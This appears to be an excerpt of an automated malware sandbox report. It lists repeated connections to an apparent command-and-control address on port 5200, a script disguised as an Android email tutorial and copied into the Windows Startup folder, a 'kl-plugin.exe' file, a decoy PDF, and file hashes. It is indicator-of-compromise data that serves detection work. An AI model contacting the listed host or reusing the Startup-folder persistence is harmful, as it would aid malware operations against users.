| US | 52.167.249.196:443 | settings-win.data.microsoft.com | tcp |
| US | 52.167.249.196:443 | settings-win.data.microsoft.com | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 209.197.3.8:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 209.197.3.8:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
Files
C:\Users\Admin\AppData\Roaming\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.js
| MD5 | 1749a68af6573286cd256660e513a837 |
| SHA1 | 32e8c409384639eaf8c12de9d673b089f13eab64 |
| SHA256 | beedfc01af698a1413c76a35899d15b1c940c824cdf96e406c668b193bc78229 |
| SHA512 | 364d8b1aa036ffeabd950b622e3d3553c00bf354547942a054ec722776ff43d63eff1f3f022c35090b4fb50d83d5974515356b6a772ae3de776fabc9351675b1 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.js
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\kl-plugin.exe
| MD5 | 7099a939fa30d939ccceb2f0597b19ed |
| SHA1 | 37b644ef5722709cd9024a372db4590916381976 |
| SHA256 | 272e64291748fa8be01109faa46c0ea919bf4baf4924177ea6ac2ee0574f1c1a |
| SHA512 | 6e179a32b3091beee71d425248ae56495e31e9df569159a93af5826ddef28fba904ae4810d3ca2da45fe6dc8be1eeaecf71e8225b3e605f22f41f4e46d1cf721 |
memory/2792-420-0x00007FFF98910000-0x00007FFF98911000-memory.dmp
\??\pipe\LOCAL\crashpad_4948_RRMLOVJMEUVWOWBW
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.pdf
| MD5 | 2d711f8b232b90c6f8d4b143f7dbbc53 |
| SHA1 | 54c0415289483e544be2b04f16a1aee060d8edfc |
| SHA256 | 1fec2880b574abd9dfa7b73f686d8422c7946d059c3d48e95676a6df89b8e919 |
| SHA512 | 6151120ba3aa71b1ed2df0ce957535100c8bbc3d5517ddd50014a9262162a131961d849feab636d33945be57f7cf740b07db3d95fe38b0ce6662a0ee11a8f2cb |
memory/2956-441-0x000002C3EFB30000-0x000002C3EFB40000-memory.dmp
memory/2956-442-0x000002C3EFB90000-0x000002C3EFBA0000-memory.dmp
memory/2956-443-0x000002C3F28A0000-0x000002C3F28A4000-memory.dmp
memory/540-460-0x00000234261F0000-0x00000234261F4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\edge_BITS_4948_269696345\0c0bbbe7-df62-4052-9ac7-7310194c8a93
| MD5 | d59b3234b2fec0b8a6f6b3ddb44dd71b |
| SHA1 | 36ceeae4dd4ad83f7be20b49099513bc22a11e0f |
| SHA256 | 16c91f3e0fd6a89648882f3fb34ccd508c4d7b7e7ac727d145584e047eae98aa |
| SHA512 | 193f7f936fb3c94f383c04c6f686d5ea65a309bb0e49ec924b34d9d0b4bb9248a9ced1d6a590e6a7536aa45677567a55be3d9cfd75718d9dd95de5664e85739d |
C:\Users\Admin\AppData\Local\Temp\edge_BITS_4948_1493607011\b22f5f18-f7ea-4290-929d-b13c03908334
| MD5 | a36d70bcd9333175811c53122f7d2c1d |
| SHA1 | 9a9a0c0ac2fc1db6e7b78868c8d4c96d747b8f1c |
| SHA256 | 26123bef7d73536450862d2c4d44963d720aa80b6fc2d8496f559cb9c1fdeb00 |
| SHA512 | e69aee2d91c50dd63030bd64cd12b5120c1db9871caf3c26b2cbf29ff96891b5f2e7d1388e4b731f77d7fb24904f379a6a8d5c1b2aacf8a8501fd0111ab0caf5 |
C:\Users\Admin\AppData\Local\Temp\edge_BITS_4948_973508087\dca58617-a795-442b-b16e-b2969c2c4ee1
| MD5 | e6e69ad11442f76dc1125af7473e7f2e |
| SHA1 | 69ffc1838d22fc2841131f073620393609a8cfe3 |
| SHA256 | b630735a31b7ed24c53d54346ca56b62a403b4f9c21fae9af4511b006e587b56 |
| SHA512 | c70a7b4e0b238f3766d64a915d44987c29cf3164c0a6cc1d14537ad0220960d284de9e3d28a248231f648390ac2e7f480306a1b562c62c2120bbf81415fca687 |